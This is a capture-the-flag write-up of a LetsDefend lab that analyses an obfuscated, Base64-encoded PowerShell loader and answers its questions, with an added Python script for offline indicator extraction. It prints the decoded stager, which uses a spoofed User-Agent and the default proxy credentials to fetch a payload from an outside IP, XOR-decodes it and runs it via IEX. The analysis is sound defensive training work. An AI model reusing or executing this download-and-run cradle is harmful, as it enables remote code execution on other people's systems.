Challenge Description

You’ve come across a puzzling Base64 script, seemingly laced with malicious intent. Your mission, should you choose to accept it, is to dissect and analyze this script, unveiling its true nature and potential risks. Dive into the code and reveal its secrets to safeguard our digital realm. Good luck on this daring quest!
Tool Needed: Cyberchef
File Location: C:\Users\LetsDefend\Desktop\script.txt
This challenge was prepared by ZaadoOfc
Credit: csnp.org


Questions

What encoding is the malicious script using?

What parameter in the powershell script makes it so that the powershell window is hidden when executed?

What parameter in the Powershell script prevents the user from closing the process?

What line of code allows the script to interact with websites and retrieve information from them?

What is the user agent string that is being spoofed in the malicious script?

What line of code is used to set the proxy credentials for authentication in the script?

When the malicious script is executed, what is the URL that the script contacts to download the malicious payload?


When you click the Lab Environment Connect button on LetsDefend, a Windows 10 VM opens, and the PowerShell script is on the desktop.

So let’s answer the questions

1 - What encoding is the malicious script using? Answer: Base64

You can use CyberChef's Magic operation or other encoding identifiers to learn which encoding was applied to a string.

2- What parameter in the powershell script makes it so that the powershell window is hidden when executed? Answer: -W Hidden

-W is the short form of the -WindowStyle argument of powershell.exe; -W Hidden is equivalent to -WindowStyle Hidden.

3- What parameter in the Powershell script prevents the user from closing the process? Answer: -NonI

-NonI is short for -NonInteractive. This parameter disables the ability of commands to prompt the user, so the user can't interrupt the process.

After this step we should decode the string. You can do it with a terminal or with online tools. I preferred to use online decoders. After decoding the string I get the clear PowerShell script:

$WC=New-ObjEcT SySTeM.NET.WebCliENt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$WC.HeADeRS.ADd('User-Agent',$u);$Wc.ProxY = [System.NeT.WEBReQUEst]::DEFAuLtWebProXy;$wc.PROxY.CrEdenTialS = [SysTem.NEt.CRedeNTIAlCAcHE]::DeFAULTNetWOrKCredENTiAls;$K='IM-S&fA9Xu{[)|wdWJhC+!N~vq_12Lty';$i=0;[CHaR[]]$B=([cHaR[]]($wc.DOwNLOaDStriNg("http://98.103.103.170:7443/index.asp")))|%{$_-BXoR$K[$I++%$k.LEnGTH]};IEX ($B-jOIn'')

4- What line of code allows the script to interact with websites and retrieve information from them? Answer: $WC=New-Object System.Net.WebClient

The WebClient class provides common methods for sending data to and receiving data from the Internet.

5- What is the user agent string that is being spoofed in the malicious script? Answer: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

The user agent string contains the information a web browser uses to identify itself to a server.

6- What line of code is used to set the proxy credentials for authentication in the script? Answer: $wc.PROxY.CrEdenTialS = [SysTem.NEt.CRedeNTIAlCAcHE]::DeFAULTNetWOrKCredENTiAls

Sets the proxy credentials to the default network credentials.

7- When the malicious script is executed, what is the URL that the script contacts to download the malicious payload? Answer: http://98.103.103.170:7443/index.asp

The URL is the argument of the WebClient DownloadString call: $wc.DOwNLOaDStriNg("http://98.103.103.170:7443/index.asp")
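The decoding step above and the indicator questions that follow it can be done offline in one pass, which is handy when the same loader shows up in more than one alert. The following Python script is an added example written for this write-up, not part of the challenge or of LetsDefend's material. It embeds the decoded one-liner from the page verbatim, wraps it in a constructed launcher line of the shape `powershell.exe -NonI -W Hidden -EncodedCommand <base64>` (the page names -NonI and -W Hidden; the Base64 blob itself is reconstructed here, so the launcher is an assumption), decodes the blob, pulls out the URL, spoofed User-Agent and XOR key, and implements the same repeating-key XOR that the script applies to the downloaded stage before handing it to IEX. The second-stage text used in the round-trip is constructed and benign; nothing is downloaded.

```python
import base64
import re

# Decoded PowerShell one-liner, copied verbatim from the write-up.
DECODED_SCRIPT = (
    "$WC=New-ObjEcT SySTeM.NET.WebCliENt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; "
    "Trident/7.0; rv:11.0) like Gecko';$WC.HeADeRS.ADd('User-Agent',$u);"
    "$Wc.ProxY = [System.NeT.WEBReQUEst]::DEFAuLtWebProXy;"
    "$wc.PROxY.CrEdenTialS = [SysTem.NEt.CRedeNTIAlCAcHE]::DeFAULTNetWOrKCredENTiAls;"
    "$K='IM-S&fA9Xu{[)|wdWJhC+!N~vq_12Lty';$i=0;"
    "[CHaR[]]$B=([cHaR[]]($wc.DOwNLOaDStriNg(\"http://98.103.103.170:7443/index.asp\")))"
    "|%{$_-BXoR$K[$I++%$k.LEnGTH]};IEX ($B-jOIn'')"
)

# Constructed, benign stand-in for the second stage (the real one is never fetched here).
SAMPLE_STAGE = "Write-Output 'constructed second-stage text'"


def make_launcher(script: str) -> str:
    """Constructed launcher line (assumption, not from the page): powershell.exe expects
    -EncodedCommand to carry Base64 of the UTF-16LE script, so encode it that way."""
    enc = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return f"powershell.exe -NonI -W Hidden -EncodedCommand {enc}"


def decode_powershell_b64(blob: str) -> str:
    """Decode a Base64 blob; -EncodedCommand payloads are UTF-16LE, which for ASCII
    text shows up as every second byte being NUL. Fall back to UTF-8 otherwise."""
    raw = base64.b64decode(blob)
    if raw.count(0) > len(raw) // 4:
        return raw.decode("utf-16-le")
    return raw.decode("utf-8")


def _string_var(script: str, name: str):
    """Return the single-quoted literal assigned to $name (PowerShell names are case-insensitive)."""
    m = re.search(r"\$" + re.escape(name) + r"(?!\w)\s*=\s*'([^']*)'", script, re.I)
    return m.group(1) if m else None


def extract_indicators(launcher: str, script: str) -> dict:
    """Answer the write-up's questions programmatically from the launcher and decoded script."""
    ind = {}
    ind["hidden_window"] = re.search(r"-W(?:indowStyle)?\s+Hidden", launcher, re.I) is not None
    ind["non_interactive"] = re.search(r"-NonI(?:nteractive)?\b", launcher, re.I) is not None
    ind["urls"] = re.findall(r"https?://[^\s\"')]+", script, re.I)
    # Follow the variable passed to Headers.Add('User-Agent', $var) back to its assignment.
    ua = re.search(r"'User-Agent'\s*,\s*\$(\w+)", script, re.I)
    ind["user_agent"] = _string_var(script, ua.group(1)) if ua else None
    # Follow the variable indexed in "-bxor $var[...]" back to the key literal.
    key = re.search(r"-bxor\s*\$(\w+)\[", script, re.I)
    ind["xor_key"] = _string_var(script, key.group(1)) if key else None
    ind["uses_default_proxy_creds"] = re.search(r"DefaultNetworkCredentials", script, re.I) is not None
    ind["invokes_expression"] = re.search(r"\bIEX\b|Invoke-Expression", script, re.I) is not None
    return ind


def xor_with_key(text: str, key: str) -> str:
    """Repeating-key XOR over code points, matching '$_ -bxor $K[$i++ % $K.Length]'.
    XOR is its own inverse, so the same call encodes and decodes."""
    return "".join(chr(ord(c) ^ ord(key[i % len(key)])) for i, c in enumerate(text))


def demo() -> dict:
    """Full triage pass: decode the launcher, extract indicators, and prove the XOR
    routine round-trips the constructed sample stage with the extracted key."""
    launcher = make_launcher(DECODED_SCRIPT)
    script = decode_powershell_b64(launcher.split()[-1])
    ind = extract_indicators(launcher, script)
    encoded = xor_with_key(SAMPLE_STAGE, ind["xor_key"])
    ind["sample_stage_roundtrip"] = xor_with_key(encoded, ind["xor_key"]) == SAMPLE_STAGE
    return ind


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

When a captured copy of index.asp is available from a proxy or sandbox, pass its text to xor_with_key with the extracted key to recover the second stage without executing anything; the key lookup is done by following the variable that the -bxor expression indexes, so it still works when the sample uses a different variable name or casing.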